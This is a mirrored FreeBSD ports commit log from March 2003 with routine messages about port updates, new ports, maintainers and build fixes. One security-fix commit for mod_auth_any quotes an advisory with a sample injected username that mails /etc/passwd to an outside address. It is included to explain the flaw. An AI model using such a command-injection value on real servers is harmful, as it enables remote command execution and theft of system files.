1
0
mirror of https://git.FreeBSD.org/ports.git synced 2025-01-07 06:40:06 +00:00
Commit Graph

73530 Commits

Author SHA1 Message Date
Gerald Pfeifer
29245523d4 Enable libgcj (which has actually been building fine since GCC 3.1 on
FreeBSD/i386 and works on FreeBSD/alpha using the hack in files/patch-ub).

PR:			47790
Partially Submitted by:	Loren James Rittle <rittle@labs.mot.com>
2003-03-26 17:42:31 +00:00
Mario Sergio Fujikawa Ferreira
4dd481bc52 Update to 2.04 rc1
Submitted by:	maintainer
2003-03-26 17:09:03 +00:00
Martin Blapp
d57aeca8a1 Hopefully fix the build on bento:
The JDK dependency needs to be at the first place, so all
following dependencies use the same JDK.
2003-03-26 17:06:20 +00:00
Mario Sergio Fujikawa Ferreira
57ffe5056b o Update to 0.90 rc5 [1]
o Add WITH_FAAD knob [1] [2]

PR:		50188 [1],
		50246 [2]
Submitted by:	maintainer [1],
		David Yeske <dyeske@yahoo.com> [2]
2003-03-26 16:17:59 +00:00
Ying-Chieh Liao
eda741f818 upgrade to 2.8.6 2003-03-26 15:35:16 +00:00
Oliver Braun
e50c73cda5 Upgrade to 2.15.
PR:		ports/50314
Submitted by:	maintainer
2003-03-26 14:32:55 +00:00
Jun Kuriyama
8c5311b85d Upgrade to 1.1.0.
No response from:	maintainer
2003-03-26 14:21:04 +00:00
Jun Kuriyama
032ac5e183 Use += instead of ?= for $MASTER_SITE_LOCAL for consistency. 2003-03-26 14:19:10 +00:00
MANTANI Nobutaka
aca8d2267e Depend on multimedia/libdvdread (and multimedia/libdvdcss indirectly)
to surely support encrypted DVDs.

Pointed out by:	eivind
2003-03-26 13:57:01 +00:00
Gerald Pfeifer
8e6bf61c38 Remove special alpha optimization warning. alpha support now should be
sufficiently stable, and the testsuite output for FreeBSD/alpha shows no
extra -O2 failures.

Submitted by:	Loren James Rittle <rittle@labs.mot.com>
2003-03-26 10:35:51 +00:00
Foxfair Hu
da326973dd PR: 48919
Assign MAINTAINER.
2003-03-26 10:29:24 +00:00
Kevin Lo
bd9a60a647 Initial import of fcitx 1.8.2
Fcitx is a simple and fast GBK Chinese XIM server.

PR: 50311
Submitted by: Shen Chuan-Hsing <statue@freebsd.sinica.edu.tw>
2003-03-26 10:29:08 +00:00
Gerald Pfeifer
a3b3aede9d Assume maintainership of this port.
Approved by:	obrien (mentor)
2003-03-26 10:19:52 +00:00
Tilman Keskinoz
748aaf3763 Update to 0.5.4, pass Maintainership to submitter.
PR:		50270
Submitted by:	Georg Graf <georg@graf.priv.at>
Approved by:	old Maintainer
2003-03-26 09:32:56 +00:00
Kevin Lo
981ba063de Initial import of synergy 1.0.3
ynergy lets you easily share a single mouse and keyboard between
multiple computers with different operating systems.
2003-03-26 09:31:42 +00:00
Ying-Chieh Liao
402d50ab9b add cdonkey 0.8.9
An open and free core client for the eDonkey protocol
2003-03-26 08:56:21 +00:00
Ying-Chieh Liao
b4939f08ab add dvorakng 0.5.0
A Dvorak typing tutor
2003-03-26 08:29:43 +00:00
Kevin Lo
28d87a6700 Update to 0.8.6
PR: 50289
Submitted by: MAINTAINER
2003-03-26 06:58:40 +00:00
Kevin Lo
8346fc308e Update to 0.2.3
PR: 50288
Submitted by: MAINTAINER
2003-03-26 06:56:16 +00:00
Kevin Lo
aab07175ca Update to version 0.6.2
PR: 45978
Submitted by: Stefan Farfeleder <stefan@fafoe.dyndns.org>
2003-03-26 06:51:12 +00:00
Norikatsu Shigemura
13011e478e o Update to 1.12[1].
o Clean up rc script to rc.conf configuratable.  Acording to the
  POLA, if you don't set it, this feature will have no effect
  (same behavior before now).

Pointed out by:	Mats Dufberg <dufberg@narnia.pp.se> [1]
2003-03-26 02:25:52 +00:00
Foxfair Hu
f801162f94 Submitted by: MAINTAINER
Strip out the RESTRICED message, blowfish is "Unpatented and royalty-free"
quoted from its homepage.
2003-03-26 01:43:46 +00:00
Foxfair Hu
5c2f1a3148 Submitted by: MAINTAINER
Update restricted message.
2003-03-26 01:39:21 +00:00
Norikatsu Shigemura
c6a95a3a85 o Build thread-safe libs by default.
o Fix pkg-plist.
o Bump PORTREVISION accordingly.

PR:		ports/50293
Submitted by:	Alex Dupre <sysadmin@alexdupre.com> (maintainer)
2003-03-25 23:39:43 +00:00
Clive Lin
48bb88dc2e Catch up with master port. 2003-03-25 22:39:04 +00:00
David E. O'Brien
4254b2988f Use MAN8PREFIX rather than PREFIX so one can "make PREFIX=/usr install".
I'm not sure how far we want to take this... most ports don't use MANPREFIX
or MAN<sect>PREFIX.

PR:		49114
Submitted by:	Rolf Grossmann <grossman@progtech.net>
2003-03-25 18:16:12 +00:00
Bruce A. Mah
5240a88511 The distfile for this release of subversion doesn't appear to be
available from the canonical site anymore.  Add MASTER_SITE_LOCAL
to MASTER_SITES so that the port can find a copy I've cached.

Approved by:	Craig Rodrigues <rodrigc@attbi.com> (MAINTAINER)
2003-03-25 17:05:54 +00:00
Oliver Braun
f5b8ff3007 Tarball has been rerolled. Developer added one tiny extra fix for Cygwin
configuration, and removed lots of files that belonged to the Hat project,
which are no longer relevant to building nhc98.

No functional change, so no need to bump PORTREVISION.

Noticed by:	Matthew Donadio <m.p.donadio@ieee.org>
2003-03-25 15:06:02 +00:00
Oliver Braun
1d202ae5e4 Fix last commit (WITH_WINBIND).
PR:		ports/50264
Submitted by:	KT Sin <ktsin@acm.org>
Approved by:	maintainer
2003-03-25 14:52:42 +00:00
Shigeyuki Fukushima
e358d694fc Set proper dependency.
PR:		ports/49024
Submitted by:	Kimura Fuyuki <fuyuki@hadaly.org>
2003-03-25 14:20:19 +00:00
MIHIRA Sanpei Yoshiro
bfad744ad0 Fix build: replace BUILD_DEPENDS with EXTRACT_DEPENDS where appropriate
Submitted by:	[FreeBSD-users-jp 73817] Akira Sasaki <0371175602@jcom.home.ne.jp>
2003-03-25 13:58:09 +00:00
Gerald Pfeifer
59be671a98 Remove commented USE_MESA (which is implied by current XFree86 ports
anyway).
2003-03-25 13:56:54 +00:00
Foxfair Hu
abe09504bd PR:
Submitted by:
Reviewed by:
Approved by:
Obtained from:
MFC after:

Put ports/security/libidea in the dark list.
2003-03-25 13:33:55 +00:00
MANTANI Nobutaka
cd37251110 Update to 0.9.19. 2003-03-25 13:09:07 +00:00
MANTANI Nobutaka
041043c9b7 Update to 1-beta9. 2003-03-25 13:07:51 +00:00
Foxfair Hu
5282cf001d Add libidea 0.8.2b, iDEA block cipher library.
PR:		43793
Submitted by:	Jim Geovedi <jim@corebsd.or.id>
2003-03-25 13:04:56 +00:00
Jacques Vidrine
33e059c87e Mark FORBIDDEN. This port installs set-user-id executables which
call system() without sanitizing the environment. It is trivially
exploitable for root privileges.

Reported by:	Niels Heinen <zillion@safemode.org>
2003-03-25 13:01:48 +00:00
Foxfair Hu
04f8da2a26 Add libbf 0.8.2b, the Blowfish block cipher Library.
PR:		43792
Submitted by:	Jim Geovedi <jim@corebsd.or.id>
2003-03-25 12:32:43 +00:00
Christian Weisgerber
3e8676b331 * Fix build with GCC3 (-CURRENT).
* Honor CXX/CXXFLAGS.
* Use predefined DOCSDIR and EXAMPLESDIR variables.

Approved by:	maintainer timeout
2003-03-25 12:28:57 +00:00
Christian Weisgerber
042500500d Update to 1.12.
PR:		49997
Submitted by:	Kimura Fuyuki <fuyuki@hadaly.org>
2003-03-25 12:18:28 +00:00
Dmitry Sivachenko
8f0f066748 Disable *all* programs that depend on X11 when WITHOUT_X11=yes and
X does present on the system.

PR:		50021
Submitted by:	Alex Dupre <sysadmin@alexdupre.com>
2003-03-25 09:29:58 +00:00
Greg Lewis
7860af7f5d . Distribution files have been moved to the Nethack Source Forge site.
Track them there.  Interestingly the name of the distribution has
  changed but the MD5 sum hasn't.

Pointed out by:		distfile survey
2003-03-25 07:22:31 +00:00
Norikatsu Shigemura
b9cd1c3026 Give maintainership to submitter.
Submitted by:	Josh Elsasser <jre@vineyard.net>
2003-03-25 05:16:13 +00:00
Dirk Meyer
f5867ecf23 - Update to 0.8.5 2003-03-25 04:53:47 +00:00
Dirk Meyer
f1cf1434a5 patch now part of distribution. 2003-03-25 04:53:22 +00:00
Kris Kennaway
91c3bdc8a8 Regenerate INDEX for 4.8-R to catch up with port retaggings. 2003-03-25 04:27:54 +00:00
Mario Sergio Fujikawa Ferreira
0025bdf0b2 o Fix vulnerability that allows execution of arbitrary commands on
the server with the uid of the apache process. Background [1]:

"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail me@my.home</etc/passwd")

"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
command line."

o Fix this by adding a escaping function from [2]. Then, modifying
  this function appropriately with ideas from [3]. Apply the new
  escaping code to mod_auth_any.
o Bump PORTREVISION

Submitted by:	Security Officer (nectar),
		Red Hat Security Response Team <security@redhat.com> [1]
Obtained from:	mod_auth_any CVS [2],
		nalin@redhat.com [3]
2003-03-25 04:23:11 +00:00
Norikatsu Shigemura
7a568562a2 Bump PORTREVISION by updating audio/speex. 2003-03-25 04:22:08 +00:00
Norikatsu Shigemura
7631b26e0a Update to 1.0.
PR:		ports/50261
Submitted by:	Josh Elsasser <jre@vineyard.net>
2003-03-25 04:22:06 +00:00
OKAZAKI Tetsurou
7d0eb04eb8 Grouping MASTER_SITES and DIST_FILES. [1]
Suppress warning "locale: not found" by nroff as /usr/bin/nroff does. [1]
Support ja_JP.EUC in nroff for backward compatibility.
PORTREVISION up.

Submitted by:	kuriyama [1]
2003-03-25 04:19:56 +00:00